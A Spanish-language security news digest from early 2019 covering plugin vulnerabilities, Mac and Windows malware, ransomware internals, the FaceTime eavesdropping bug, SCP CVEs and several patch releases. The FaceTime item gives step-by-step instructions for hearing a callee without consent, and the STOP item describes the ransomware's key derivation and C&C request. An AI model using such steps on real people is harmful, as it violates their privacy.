La primera de las vulnerabilidades permitiría a un atacante no autenticado realizar un ataque XSS persistente través de un formulario de encuesta. Este error es debido a una incorrecta codificación en uno de los campos a la hora de mostrar los resultados de dicha encuesta.

La segunda vulnerabilidad permite la extracción de información sensible de la base de datos a través de una inyección SQL relaccionada con la acción de eliminar envíos. Para aprovechar este fallo de seguridad sí es requerido que el atacante esté autenticado en el sistema y tenga permisos para realizar esta acción.

La siguiente vulnerabilidad existe gracias a la carga de archivos, la cual podría ser aprovechada para realizar un ataque XSS, debido a que el fichero que se sube a través del formulario es añadido directamente al DOM.

Otra vulnerabilidad existe debido a una falta de protección al abrir una pestaña nueva en el navegador, la cual podría permitir a un atacante remoto el robo de información sensible a través de la recarga de una página falsa en la pestaña origen. A este tipo de ataque se le conoce como ‘Tab Napping’.

La última vulnerabilidad reportada aparece en la acción de exportación de resultados, que podría ser aprovechada para revelar información sensible a través del envío de datos especialmente manipulados en un formulario.

Las vulnerabilidades, que actualmente tienen pruebas de concepto para su explotación, fueron reportadas el día 25 de noviembre de 2018, y disponen de una solución oficial desde el día 10 de diciembre.

Más información
Forminator 1.5.4 – Unauthenticated Persistent XSS, Blind SQL Injection, Misc
https://security-consulting.icu/blog/2019/02/wordpress-forminator-persistent-xss-blind-sql-injection/

Nueva herramienta de Google alerta cuando utilizas credenciales comprometidas en una web

Hoy, 5 de febrero, Google ha lanzado un servicio que ha sido diseñado para alertar a los usuarios cuando usan una combinación exacta de nombre de usuario y contraseña para cualquier sitio web que haya sido expuesto anteriormente a violación de datos de terceros.

El nuevo servicio denominado Password Checkup, compara las credenciales ingresadas con una base de datos cifrada que contiene más de 4 mill millones de credenciales comprometidas.

Google asegura que la compañía ha hecho uso de una implementación orientada a la privacidad que mantiene toda su información privada y anónima al cifrar sus credenciales antes de compararlas con su base de datos en línea.

Explicación del funcionamiento de la extensión.

La extensión en cuestión está disponible en el Chrome Store y cualquiera puede descargarla gratuitamente.

Si quieres usar alguna alternativa a la extensión, puedes revisar contraseñas manualmente en el sitio HaveIBeenPwned.

Más información:
Password Checkup:
https://chrome.google.com/webstore/detail/password-checkup/pncabnpcffmalkkjpajodfhijclecjno

Malware en Mac roba cookies relacionadas con las casas de cambio de criptomonedas

CookieMiner, así han apodado al nuevo malware responsable de robar cookies relacionadas con el intercambio de criptomonedas. Este malware ha sido diseñado específicamente para usuarios de Mac y se cree que su funcionamiento está basado en DarthMiner, otro malware diseñado para Mac que se detectó en diciembre del año pasado.

Ha sido detectado por el equipo de Unit 42 de Palo Alto Networks. CookieMiner no solo roba las cookies de nuestros exchanges, también instala de forma encubierta el software necesario para minar criptomonedas con nuestro equipo.

En este caso parece que el malware está orientado a la minería de “Koto”, una criptomoneda menos conocida que se usa principalmente en Japón.

Una vez estamos infectados con CookieMiner, se pone en marcha la búsqueda de todos los nombres de usuario, contraseñas e información de la tarjeta de crédito que podamos tener guardados en Chrome, nuestros datos del wallet y las claves privadas para poder acceder a ellos y por último los mensajes de texto de las víctimas del iPhone almacenados en las copias de seguridad de iTunes.

Se detectó que cookieMiner está apuntando a servicios como Binance, Coinbase, Poloniex, Bittrex, Bitstamp, MyEtherWallet y cualquier sitio web con “blockchain” en su dominio y que utilice cookies para rastrear a sus usuarios temporalmente. Si observamos la combinación de las vías de ataque expuestas en las que obtendrían credenciales de inicio de sesión, cookies web y datos SMS robados, es posible que un atacante pueda saltarse la autenticación en dos pasos.

Cabe destacar que los investigadores aún no han encontrado ninguna evidencia de que los atacantes hayan retirado fondos de la billetera o cuenta de algún usuario, pero están especulando sobre el comportamiento del malware.

Fuentes:

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
https://thehackernews.com/2019/02/mac-malware-cryptocurrency.html

El FBI planea cerrar la botnet Joanap

‘Joanap’ la botnet que lleva activa desde 2009 y que ha infectado a usuarios de Windows de más de 17 países diferentes está siendo mapeada por el gobierno de los Estados Unidos.

Se cree que sus responsables son el grupo ‘Hiden Cobra‘, también conocido como ‘Lazarus Group’ o ‘Guardians of Peace’ y que están respaldados por el gobierno de Corea del Norte. Hace algún tiempo @devploit habló sobre Joanap en este mismo blog, donde hizo un breve resumen del funcionamiento de dicho malware.

El Departamento de Justicia (DoJ) de Estados unidos anunció el pasado miércoles su esfuerzo por mapear la red de bots vinculada a este malware. El FBI y la Oficina de Investigaciones Especiales de la Fuerza Aérea (AFOSI) obtuvieron órdenes legales de búsqueda que permitieron a las agencias unirse a la botnet infectando intencionadamente máquinas en entornos controlados para imitar el comportamiento de los demás usuarios infectados y recolectar información técnica que permita identificarlos.

La información recopilada sobre los usuarios infectados incluía direcciones IP, puertos y marcas de tiempo que permitieron construir un mapa de la red de bots actual. Las agencias están ahora contactando con las víctimas para notificar de la presencia del malware en sus equipos a través de sus proveedores de servicios de internet e incluso enviando notificaciones personales.

El Departamento de Justicia de los Estados Unidos y el FBI también coordinarán la notificación a las víctimas extranjeras del malware ya que comparten los datos con gobiernos de otros países.

Fuentes:

https://thehackernews.com/2019/01/north-korea-hacker.html

https://www.fayerwayer.com/2019/01/estados-unidos-botnet-joanap/

Descubierta Facebook bonificando a usuarios por instalar una aplicación que accede a todo el tráfico de red

Recientemente la empresa TechCrunch ha publicado un completo informe en el que demuestran como Facebook estaba bonificando a usuarios, de edades comprendidas entre 23 y 35 años, con hasta 20$ al mes por instalar la aplicación Facebook Research fuera del market oficial de Apple.

La aplicación era distribuida a través de aplicaciones como BetaBound, uTest y Applause y daba capacidad de recopilar la siguiente información:

  • Mensajes privados en aplicaciones de redes sociales.
  • Chats desde aplicaciones de mensajería instantánea.
  • Fotos y vídeos enviados a través de cualquier aplicación.
  • Correos electrónicos.
  • Búsquedas en Internet.
  • Actividad de navegación web.
  • Cualquier información adicional que requiriesen otras aplicaciones, como la ubicación en tiempo real.

Esto lo conseguía a través de la instalación de un certificado raíz, lo cual le permitía a Facebook acceder a todo el tráfico de red.

Esta funcionalidad supone una violación de los términos de servicio de Apple por lo que Facebook se expone a sanciones que pueden llegar hasta el punto de retirarles el certificado usado para la firma de la aplicación.

La aplicación ya ha sido retirada por Facebook en iOS pero sigue disponible para Android, por lo que faltaría que Google se pronunciase al respecto. Koodous muestra que hay versiones de la aplicación desde el 15 de octubre de 2017.

Noticias de Seguridad Enero 2019

¿Podría WhatsApp estar exponiendo tus mensajes?

Saltan las alarmas cuando leemos que una empresa puede estar tratando nuestros datos de manera irregular, y como no, WhatsApp siempre está en el punto de mira.

Las muchas noticias sobre fallos en Whatsapp y Facebook (su comprador) han conseguido generar desconfianza en la aplicación, tal es así que muchos de vosotros habéis optado por aplicaciones de mensajería alternativas.


WhatsApp no parece tener un error que exponga los mensajes de sus usuarios, simplemente, así es como fnciona el servicio.


Todo el revuelo sobre la exposición de mensajes empezó a raíz del siguiente tweet:

A partir de aquí se empezó a sugerir que la conocida aplicación de mensajería podría tener un error de privacidad enorme y podría estar exponiendo, bajo ciertas circunstancias, algunos de nuestros mensajes a otros usuarios.

Si leemos el Tweet de Abby Fuller comenta que, cuando instaló WhatsApp en su nuevo teléfono, con su nuevo número, encontró lo que sería el historial de mensajes del propietario anterior del mismo número.

Ya que para WhatsApp nuestro número de teléfono es nuestro nombre de usuario y la contraseña es la OTP (One-Time Password o contraseña de un solo uso) que envían a ese mismo número, no es una vulnerabilidad, así es como funciona el servicio.

WhatsApp mencionó en su blog que “common practice for mobile providers to recycle numbers, you should expect that your former number will be reassigned”


“Es una práctica común que los proveedores de servicios móviles reciclen números, es de esperar que su anterior número sea reasignado.”


En sus tweets, Fuller dijo que el historial de mensajes “no era completo, pero eran conversaciones reales” Queda por confirmar si esos mensajes incluían algún mensaje enviado por el anterior propietario del número.

A pesar de todo, la configuración de WhatsApp en un nuevo dispositivio con un número de teléfono nuevo no permite restaurar el archivo de mensajes del propietario anterior porque la empresa nunca realiza copias de seguridad de las conversaciones cifradas en sus servidores, actualmente las copias de seguridad de WhatsApp son almacenadas en nuestro Google Drive o localmente en el dispositivo.

Sin embargo, la empresa de mensajería mantiene los mensajes pendientes 45 días en su servidor hasta que el destinatario está en línea y los puede entregar. Después de esos 45 días los mensajes son eliminados.

Esto sugiere que los mensajes que Fuller encontró en su nueva cuenta de WhatsApp fueron, probablemente, mensajes no entregados que enviaron los contactos del antiguo propietario antes de que éste dejara de usar el número.

Para evitar que sus mensajes anteriores lleguen a otros dispositivos, WhatsApp recomienda a los usuarios eliminar su cuenta antes de dejar de usar una tarjeta SIM o cambiar de cuenta con la función “cambiar de número” que está disponible en la configuración de la APP.

Esto es lo que podría haber pasado

Algunos usuarios de sitios web como Reddit o Twitter sugieren que el mecanismo de eliminación de mensajes tras los 45 días en los servidores de WhatsApp contiene un error que, eventualmente, mantiene los mensaje sin entregar almacenados en el servidor de la compañía durante más tiempo. Pero todavía queda un detalle importante por mencionar, El antiguo usuario del número no necesitaba su tarjeta SIM para seguir usando su cuenta de WhatsApp, una vez que esté configurada en el teléfono. Eso significa que es probable que el antiguo propietario del número aún estuviera usando su cuenta después de deshacerse de su SIM hasta que Fuller configuró el mismo número y verificó la cuenta usando el OPT recibido.

Fuentes

https://faq.whatsapp.com/en/s40/28030001/
https://thehackernews.com/2019/01/whatsapp-privacy-chats.html

Fallo en Twitter expone tweets privados en Android

Un error en la aplicación para Android de Twitter deja abierta la posibilidad de acceder a tweets protegidos. Este fallo existe desde 2014, como podemos ver en la publicación de Twitter del pasado 17 de este mes.

Autor fayerwayer.com

Si se da el caso en el que quieres que tus tweets sean privados, Twitter te da la opción “proteger tus tweets”, lo que obliga a otros usuarios a seguirte para poder ver tu contenido. Pero si utilizas Android es posible que tus tweets hayan estado públicos debido a un fallo de la aplicación. El problema lo provocó que Twitter deshabilitara la configuración “proteger tus tweets” a los usuarios que realizaron ciertos cambios en la configuración de su cuenta, como cambiar la dirección de email asociada a la cuenta.

La compañía ha afirmado que este problema se ha resuelto a principios de esta semana y que tan solo afecta a dispositivos Android. Las versiones web e iOS no se han visto afectadas. Los usuarios que hayan visto vulnerada su privacidad ya fueron avisados. No es la primera vez que Twitter tiene problemas a la hora de asegurar nuestra privacidad, si recordamos, hace unos meses la red social expuso mensajes privados de sus usuarios.

Para asegurarte de que tu cuenta está protegida puedes acceder dentro de la aplicación de Twitter a la opción de “Configuración y privacidad” y una vez allí a “Privacidad y seguridad”. Ahí encontrarás la opción de “Proteger mis tweets”, donde podrás ver si está protegida o no.

Más información:

Twitter:
https://help.twitter.com/en/protected-tweets-android

Theverge
https://www.theverge.com/2019/1/17/18187143/twitter-bug-android-protected-tweets-turned-off

Bug en iPhone FaceTime permite escuchar y ver a la otra persona antes de descolgar

Ha sido encontrado un fallo en la aplicación de videoconferencias FaceTime, disponible tanto en iOS como en Mac por defecto, que permite escuchar y ver a la persona que se está llamando antes de que ésta acepte la llamada.

Group-FaceTime-iOS-12.12

El fallo es reproducible tanto en iPhone como Mac sin necesidad de conocimientos técnicos y sin que la otra persona se dé cuenta de que está siendo espiada. Para la explotación, no se requieren conocimientos técnicos, aunque si se quiere obtener también vídeo el método es más complicado. Para obtener sólo el audio deben seguirse los siguientes pasos:

  1. Comenzar una llamada usando FaceTime con otro contacto.
  2. Mientras la llamada queda a la espera de aceptación, deslizar hacia arriba para acceder al menú de la llamada, y pulsar en “Añadir persona”.
  3. Añade tu propio número de teléfono a la llamada.
  4. Listo. Comenzará una llamada grupal entre tú mismo y la persona afectada, sin necesidad de que acepte la llamada grupal.

Para obtener además el vídeo, existen diferentes métodos. Según @Jessassin, si otro dispositivo accede a la llamada mediante invitación, la víctima transmitirá también su vídeo. Otra opción, es si la víctima pulsa el botón de encendido en la pantalla de desbloqueo, tras lo cual también enviará el vídeo.

El fallo se ha vuelto popular en la redes sociales bajo el “hashtag” #facetimebug, con usuarios probando por sí mismos el fallo para su asombro. Desde Apple ya han confirmado el error, y van a solucionarlo en una actualización de seguridad esta misma semana. Para evitar ser víctima de este error, se recomienda desactivar Facetime accediendo al menú de opciones del Iphone, acceder al botón de FaceTime, y pulsar en el primer interruptor para ponerlo en gris.

Actualización: debido a la repercusión que ha tenido el bug, Apple ha decidido deshabilitar las llamadas grupales.

Fuente:

Major iPhone FaceTime bug lets you hear the audio of the person you are calling … before they pick up:
https://9to5mac.com/2019/01/28/facetime-bug-hear-audio/

Aparecen dos nuevas campañas de malware que se propagan a través de macros de MS Word

Investigadores de seguridad han descubierto dos nuevas campañas de malware, una de las cuales distribuye el troyano Ursnif, mientras que la otra además de propagar el mismo malware, infecta al objetivo con el ransomware GandCrab.

Aunque ambas campañas parecen ser trabajo de grupos de ciberdelincuentes separados, hay muchas similitudes en su ‘modus operandi‘.

Similitudes del ataque:

Ambos ataques comienzan con correos eletrónicos en la que suplantan la identidad de un conocido para adjuntar un documento de Microsoft Word. Este documento contiene macros de VBS maliciosas que hacen uso de Powershell para ejecutar su carga útil e infectar al objetivo.

Infección de Ursnif & GandCrab:

Como hemos explicado, el documento de MS Word contiene una macro maliciosa en VBS. Si esta se ejecuta con éxito, hace uso de Powershell para descargar y ejecutar tanto Ursnif como GandCrab en los sistemas infectados. En la siguiente imagen se puede ver de manera más clara:

La primera carga útil es una línea de Powershell codeada en base64 la cual evalúa la arquitectura del sistema objetivo y, dependiendo de la misma, descarga una carga adicional de Pastebin. Esta se ejecuta en memoria para hacer bypass de los antivirus comunes.

Finalmente, la carga útil instala una variante del ransomware GandCrab en el sistema de la víctima, bloqueándolo hasta que pague el rescate pertinente.

Infección de Ursnif:

Al igual que el anterior malware comentado, hace uso de macros VBS sobre un documento Word malicioso para iniciar la infección.

En este caso, una vez que se ha ejecutado, el malware recopilar información del sistema, la coloca en un archivo con formato CAB y la envía a su C&C a través de una conexión HTTPS.

Los investigadores de la compañía Talos han publicado una lista de indicadores de compromiso, junto con los nombres de los nombres de archivo de carga que utilizan sobre las máquinas comprometidas.

Más información:

Publicación de Carbon Black sobre GandCrab:
https://www.carbonblack.com/2019/01/24/carbon-black-tau-threatsight-analysis-gandcrab-and-ursnif-campaign/

Publicación de Talos sobre Ursnif:
https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html

‘STOP Ransomware’ aumenta el número de victimas en los últimos meses

Desde el mes de diciembre han aparecido múltiples variantes del ransomware conocido como ‘STOP ransomware’ que han infectado miles de usuarios.

Durante el mes de diciembre y en lo que llevamos de enero, se han distribuido hasta 17 variantes de este ransomware. Todas ellas han sido distribuidas a través de sitios de descarga de cracks y software pirata como KMSPico, Cubase y Photoshop, entre otros.

Las variantes distribuidas durante esta campaña de ransomware no incluyen cambios importantes en su código, tan solo cambia la extensión utilizada para renombrar los ficheros cifrados. Las extensiones de las muestras conocidas hasta la fecha son: .djvu, .djvuu, .udjvu, .djvuq, .uudjvu, .djvus, .djvur, .djvut, .djvup, .djuvq, .pdff, .tro, .tfude, .tfudeq, .tfudet, .rumba y .adobe.

En el apartado técnico, este ransomware utiliza Salsa20 como algoritmo de cifrado y una clave de 256 bits diferente para cada archivo. Para generar la clave de cifrado por cada fichero, usa una clave maestra que se obtiene realizando una petición al servidor de control, sin embargo, en caso de no poder realizar la conexión, usaría una clave maestra por defecto ya almacenada en el código. Una vez obtenida el hash md5 de dicha clave, se crea una cadena de texto con los primeros 5 bytes del fichero a cifrar concatenado con el hash MD5 de la clave maestra, y se utiliza como clave de cifrado el hash MD5 de esta cadena de texto. Como vector de inicialización (IV) para el algoritmo de cifrado utiliza los primeros 8 bytes de la clave.

Estas variantes del ransomware incluyen una peculiaridad que podría utilizarse para recuperar ciertos ficheros, y es que cifra únicamente los primeros 153600 bytes del fichero. Por el momento, el investigador y analista de malware, Michael Gillespie, ha publicado una herramienta que permite descifrar los ficheros cifrados utilizando la clave maestra que incluye por defecto el ransomware. Aun no existe una herramienta que permita el descifrado de ficheros cifrados utilizando las claves proporcionadas por el servidor de control puesto que los atacantes las cambian continuamente.

Cada una de las variantes utiliza un servidor de control diferente y estos servidores suelen estar activos durante un par de días, ya que mientras el servidor de control esté activo es posible obtener la clave de cifrado replicando la misma petición realizada por el malware. Para la obtención de la clave el malware realiza una petición HTTP GET a un fichero get.php y pasa como parámetro una variable pid cuyo valor es el hash MD5 de la dirección MAC del adaptador de red del ordenador (get.php?pid=md5(MAC_ADDRESS)).

Se detecta una familia de Ransomware, Anatova

McAfee ha publicado una noticia en la que anuncia (y alerta) una nueva familia de Ransomware detectada, la cual han bautizado con el nombre de Anatova.

La detección de esta familia se realizó a través de redes P2P privadas, y se cree que Anatova puede ser un peligro serio para la red en general debido a la extensión modular con la que se ha creado el malware y al auto cifrado del que dispone sus recursos a través de estas redes.

El método de entrada que utiliza Anatova normalmente es el engaño de la víctima a través de un camuflado de su iconos con uno de juegos o aplicaciones conocidas en estas redes P2P, lo que lo hace más amigable para las víctimas.

El objetivo de la familia, como todo ransomware es el cifrado de todos los documentos de la máquina infectada para después pedir un rescate en criptomonedas, que en las muestras analizadas asciende a 10 DASH, que al cambio a dólares son unos 700$. Aunque esta muestra también es capaz de cifrar archivos compartidos en unidades montadas en el sistema.

Sobre el proceso de cifrado, los investigadores de McAfee  que descubrieron el malware alertan de que será imposible la creación de un software para desinfectar el sistema y recuperar los archivos cifrados, debido a que la muestra genera un par de claves RSA para el cifrado de los archivos para cada usuario.

El malware en cuestión analizado, dispone del hash ‘170fb7438316f7335f34fa1a431afc1676a786f1ad9dee63d78c3f5efd3a0ac0’ y cuenta con unas técnicas que dificultan su análisis:

  • Cifrado de la mayoría de las cadenas de texto utilizadas.
  • Llamadas a funciones utilizadas de forma dinámica.
  • Protección anti-debug que hace que en las fases de análisis estático encuentre el final del programa rápidamente.

A parte de estos comportamientos avanzados, también cuenta con otras comprobaciones que hace que el malware no se ejecute como puede ser el nombre de usuarios del sistema, el  entorno de ejecución o el lenguaje del sistema.

Esta familia no afectará a las máquinas en países de la CEI, Siria, Egipto, Marruecos, Irak e India. Un comportamiento que a menudo es habitual en los creadores de este tipo de malware, lo que puede dar pistas del lugar de origen de la muestra.

Tambien han publicado una gráfica con las detecciones en varios paises, Siendo los Estados Unidos donde más muestras se han detectado, aunque afecta seriamente a los países Europeos.

Más información:
Blog de McAfee
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/

Oracle corrige 284 vulnerabilidades en su actualización de seguridad de enero

Oracle publica su actualización correspondiente al mes de abril. Contiene parches para 284 nuevas vulnerabilidades diferentes en múltiples productos pertenecientes a diferentes familias, que van desde el popular gestor de base de datos Oracle Database hasta Solaris, Java o MySQL.

Los fallos se dan en varios componentes de múltiples productos y como es habitual la lista completa de productos afectados es cada vez más extensa. Se concreta en las siguientes familias:

  • Oracle Database Server
  • Oracle Communications Applications
  • Oracle Construction and Engineering Suite
  • Oracle E-Business Suite
  • Oracle Enterprise Manager Products Suite
  • Oracle Financial Services Applications
  • Oracle Food and Beverage Applications
  • Oracle Fusion Middleware
  • Oracle Health Sciences Applications
  • Oracle Hospitality Applications
  • Oracle Hyperion
  • Oracle Insurance Applications
  • Oracle Java SE
  • Oracle JD Edwards Products
  • Oracle MySQL
  • Oracle PeopleSoft Products
  • Oracle Retail Applications
  • Oracle Siebel CRM
  • Oracle Sun Systems Products Suite
  • Oracle Supply Chain Products Suite
  • Oracle Support Tools
  • Oracle Utilities Applications
  • Oracle Virtualization

A continuación ofrecemos una relación de productos y el número de vulnerabilidades corregidas:

  • Tres nuevas vulnerabilidades corregidas en Oracle Database Server, ninguna es explotable de forma remota sin autenticación.
  • 33 nuevas vulnerabilidades afectan a Oracle Communications (29 de ellas podrían ser explotadas por un atacante remoto sin autenticar).
  • 4 nuevos parches para la suite Oracle Construction and Engineering, todas explotables remotamente sin autenticación.
  • Otras 16 vulnerabilidades explotables de forma remota y sin autenticación en la suite de Oracle E-Business.
  • 11 nuevas vulnerabilidades en Oracle Enterprise Manager (9 de ellas explotables remotamente por un usuario sin autenticar).
  • Otros 9 parches que solucionan vulnerabilidades explotables remotamente y sin autenticación en Oracle Financial Services.
  • 6 nuevos parches para las aplicaciones de Oracle Food and Beverage (3 de ellos solucionan vulnerabilidades explotables por un usuario remoto no autenticado).
  • 62 parches para Oracle Fusion Middleware (57 de estos arreglan fallos que pueden ser explotables de forma remota sin autenticación).
  • 6 vulnerabilidades en Oracle Health Sciences, de las cuales, 2 podrían ser explotadas por un atacante remoto sin autenticar.
  • 5 nuevas vulnerabilidades en Oracle Hospitality Applications (ninguna de ellas es explotable remotamente sin autenticación).
  • Una vulnerabilidad en Oracle Hyperion, no explotable de forma remota.
  • Referente a Oracle Insurance Applications, se han publicado 5 nuevos parches, tres de los cuales son explotables de forma remota sin autenticación.
  • En cuanto a Oracle Java SE, se han corregido 5 nuevas vulnerabilidades que pueden ser explotadas por un atacante remoto sin autenticar.
  • La actualización para Oracle JD Edwards corrige 2 vulnerabilidades explotables remotamente sin autentcación.
  • Otras 30 actualizaciones de seguridad para Oracle MySQL (3 de ellas corrigen vulnerabilidades explotables de forma remota sin autenticación).
  • Una actualización en Oracle People Soft soluciona 20 problemas de seguridad, 15 de ellos pueden ser explotados por un atacante remoto sin autenticar.
  • También se solucionan 16 nuevas vulnerabilidades en Oracle Retail Applications (15 de ellas son explotables de forma remota sin autenticación).
  • Un nuevo parche para Oracle Siebel CRM que corrige una vulnerabilidad explotable remotamente.
  • 11 nuevas vulnerabilidades para Oracle Sun Systems (5 de ellas podrían ser explotadas por un atacante remoto sin autenticación).
  • Otras 5 actualizaciones de seguridad para Oracle Supply Chain, 4 de estas podrían ser explotadas de forma remota sin autenticación.
  • Una vulnerabilidad en Oracle Support Tools, que podría ser explotada remotamente.
  • Adicionalmente se solucionan 2 nuevas vulnerabilidades en Oracle Utilities Applications, ambas serían explotables por un atacante remoto sin autenticar.
  • Por último, también se ha publicado una actualización que soluciona 30 fallos de seguridad en Oracle Virtualization (4 de estos fallos podría ser explotados por un atacante remoto sin autenticación).

Se recomienda comprobar las matrices de productos afectados, gravedad y la disponibilidad de parches, disponibles desde la notificación oficial en:

Oracle Critical Patch Update Advisory – January 2019
https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html

Vulnerabilidades en SCP permiten escritura de ficheros arbitrarios en el cliente

scp

La vulnerabilidad principal, que data de hace 35 años, afecta a OpenSSH SCP, PuTTY PSCP y WinSCP. El fallo permite al servidor escribir ficheros en el cliente sin que se dé cuenta.

SCP es una herramienta para transferir ficheros a través de SSH empleada por administradores de todo el mundo, y que cuenta con múltiples implementaciones para diferentes sistemas, como OpenSSH, PuTTY o WinSCP. El fallo descubierto, permitiría a un servidor malicioso copiar ficheros no solicitados en el equipo del cliente sin informarse de ello.

Un posible caso de explotación, tal y como detalla sintonen.fi, sería un ataque MitM (Man in the Middle) entre un administrador y un servidor que administre, para que al utilizar scp se copie a su máquina un fichero ‘.bash_aliases’ en su directorio de usuario que permita al atacante ejecutar cualquier comando en la máquina del sysadmin. Este tipo de ataque requiere que la víctima acepte el cambio de fingerprint en el servidor.

El problema principal, que se encuentra desde 1983 (hace 35 años), tiene como origen el protocolo RCP del proyecto BSD, que es en el que se basa SCP. Debido al error la mayoría de clientes SCP no validan correctamente que los ficheros devueltos por el servidor son aquellos que se solicitó. Las vulnerabilidades en concreto son:

  • CWE-20 (CVE-2018-20685):  validación incorrecta del nombre de directorio. El servidor puede cambiar permisos de la carpeta utilizando un nombre de carpeta vacío (“D0777 0 \n”) o con punto (“D0777 0 .\n”).
  • CWE-20 (CVE-2019-6111 y CVE-2018-20684 en WinSCP): debido al estándar derivado de rcp de 1983, es el servidor el que establece los ficheros que se copian al cliente sin que se valide. Si se utiliza el parámetro “-r”, también pueden copiarse carpetas sin validación.
  • CWE-451 (CVE-2019-6109): spoofing en el cliente utilizando el nombre del objeto. Mediante dicho nombre, pueden escribirse caracteres ANSI que modifiquen la salida, para por ejemplo ocultar archivos transferidos.
  • CWE-451 (CVE-2019-6110): spoofing en el cliente utilizando stderr. Similar al anterior, pero aprovechando que el servidor puede escribir una salida de error en el cliente.

Algunos de los clientes afectados son OpenSSH scp (versiones anteriores a 7.9), PuTTY PSCP (todavía sin parche), y WinSCP scp (hasta la versión 5.13). Una posible solución si el cliente lo permite (como OpenSSH) es cambiar el protocolo a SFTP, aunque los servidores utilizados deben de soportar dicho protocolo. Otros clientes o programas que empleen SCP pueden encontrarse afectados.

Fuente:

scp client multiple vulnerabilities:
https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt

Adobe parchea dos vulnerabilidades graves en Acrobat y Reader

Los investigadores de Trend Micro’s Zero Day Initiative Abdul-Aziz Hariri y Sebastian Apelt, han reportado a Adobe dos importantes vulnerabilidades en Adobe Acrobat y Adobe Readerpara Windows y MacOS que permiten el compromiso total del sistema con tan solo abrir un fichero PDF.

adobe-bug-exploits-vulnerability

Adobe no hay dado de momento más detalles acerca de las vulnerabilidades a pesar de estar clasificadas con criticidad alta, ya que se permite la escalada de privilegios y la ejecución arbitraria de código.

La primera vulnerabilidad, reportada por Apelt, es un use-after-free que puede conducir a la ejecución remota de código. Ésta tiene el identificador CVE-2018-16011.

La segunda falla, descubierta por Hariri y con identificador CVE-2018-19725, permite la escalada de privilegios

Las versiones afectadas son Acrobat and Reader DC 2015 version 2015.006.30461 y anteriores, 2017 version 2017.011.30110 y anteriores, versión Continuous 2019.010.20064 y anteriores, tanto para Mac como paraWindows.

 

Más información:

https://thehackernews.com/2019/01/adobe-reader-vulnerabilities.html

https://helpx.adobe.com/security/products/acrobat/apsb19-02.html

La NSA lanzará su herramienta de ingeniería inversa GHIDRA

La Agencia de Seguridad Nacional de los Estados Unidos (NSA) planea lanzar gratuitamente su herramienta de ingeniería inversa (de aquí en adelante reversing) desarrollada internamente en la próxima conferencia de seguridad RSA 2019, que tendrá lugar en San Francisco durante el mes de marzo.

La existencia de este software fue revelada públicamente por primera vez en las filtraciones de la CIA Vault 7, pero ha pasado desapercibida hasta que Robert Joyce anunció su lanzamiento público en su descripción de la sesión de la conferencia RSA.

¿Qué es GHIDRA?

GHIDRA es un marco de trabajo de reversing desarrollado por NSA y utilizado por la misma durante más de una década.

La herramienta está escrita en Java y desde que salió a la luz se han hecho numerosas comparaciones con el conocido software IDA. Incluso hay varios hilos de Reddit como este en el que aparecen ex-empleados de la agencia que dan su opinión junto con algunos detalles del funcionamiento del programa.

¿Va a ser de código abierto?

Se está hablando mucho de la posibilidad de que la herramienta sea de código abierto. De ser así, el mantenimiento y mejora de la misma sería más cómodo, pero la NSA no suele ser partidaria de compartir su conocimiento (como bien sabemos…).

A día de hoy no hay comunicado oficial de si será publicado el código o no, pero nos mantendremos a la espera para comprobar que ocurre el día 5 de marzo y si veremos el código publicado en el Github de la NSA.

Más información:

Enlace a Vault 7:
https://wikileaks.org/ciav7p1/cms/page_9536070.htm

Enlace a descripción de Robert Joyce:
https://www.rsaconference.com/events/us19/agenda/sessions/16608-come-get-your-free-nsa-reverse-engineering-tool

Ethereum Classic sufre un ataque 51%

La popular serie de atresmedia “La casa de papel” en la que una banda organizada entra en la casa de moneda y timbre con el objetivo de robar millones de euros parece cobrar vida en la red. A grandes rasgos, un supuesto grupo organizado ha robado 1,5 millones de dólares haciéndose con el 63% de la tasa total de hash de la red de Ethereum.

El ataque

¿Qué es un ataque 51%?
Las criptomonedas están basadas en redes distribuidas y descentralizadas con la intención de que cualquiera pueda acceder a ellas de manera más o menos sencilla, o lo que es lo mismo, una democracia digital en la que 100 hipotéticos usuarios controlan las transacciones. Si alguien pudiese controlar 51 de esos 100 usuarios con derecho a voto, tendría el control total de la red, lo que daría lugar a la posibilidad de crear una bifurcación de la red o incluso bloques falsos.

Ethereum Classic ha sido, supuestamente, víctima de este tipo de ataque. El pasado día 6 de enero la empresa china SlowMist hacía pitar las alarmas, al poco tiempo, un analista de CoinNess que investigaba el suceso descubrió que un grupo privado había logrado aumentar su poder de hash a 3.263GH/s (300GH/s de tasa normal), logrando ser el grupo minero más poderoso durante un breve período de tiempo en el que podría haberles dado tiempo a robar 88.500 Ethereum Classic (ETC), el equivalente a 460.000 dólares. Pero no acabó ahí, unas 10 horas más tarde volvía a aumentar su tasa de hash.

Coinbase, una de las webs más reconocida para el intercambio, compra y venta de criptomonedas, detuvo todas las transacciones de Ethereum Classic. El exchange descubrió otros 12 ataques que tenían relación con Ethereum y los gastos dobles, ascendiendo la cantidad a 219.500 ETC o 1,1 millones de dólares al cambio.

La empresa

Para la sorpresa de muchos, los desarrolladores de la criptomoneda afirman que el blockchain no ha sido objetivo de ningún ataque, además de negar la noticia del doble gasto. Todo el revuelo lo achacan a una “reorganización profunda de la cadena de bloques”, tal y como dicen en su twitter.

Los desarrolladores de ETC respondieron rápidamente a las acusaciones afirmando que un grupo de mineros estaban siendo “poco honestos” ejerciendo una minería egoísta. Además explicaron que el fabricante linzhi estaba en proceso de probar nuevas máquinas Ethash, lo que resultó en una subida de más del 50% en la tasa de hash, no teniendo nada que ver esto con un ataque 51%. También dieron respuesta al tema de los gastos dobles alegando no haberlos detectado.

A pesar de la respuesta por parte del equipo de Ethereum Classics, Coinbase sigue bloqueando las transacciones de ETC y está monitorizando la moneda para determinar la actividad en el futuro.

Contramedidas de las casas de cambio

Pocas son las casa de cambio que han emitido algún tipo de comunicado que tenga relación al supuesto ataque 51%, pero alguna de ellas han detenido el retiro y depósito de la criptomoneda.

Coinbase comunicó que sus fondos no fueron afectados ya que detuvieron las transacciones a tiempo

Poloniex tiene bloqueadas las transacciones hasta el día 9 o nuevo aviso a la espera de que la red de Ethereum se estabilice, tal y como dijo por twitter, y aseguran que los fondos de los usuarios se encuentran a salvo.

Kraken han detenido las transacciones hasta nuevo aviso, aquí podemos consultar el estado y las noticias.

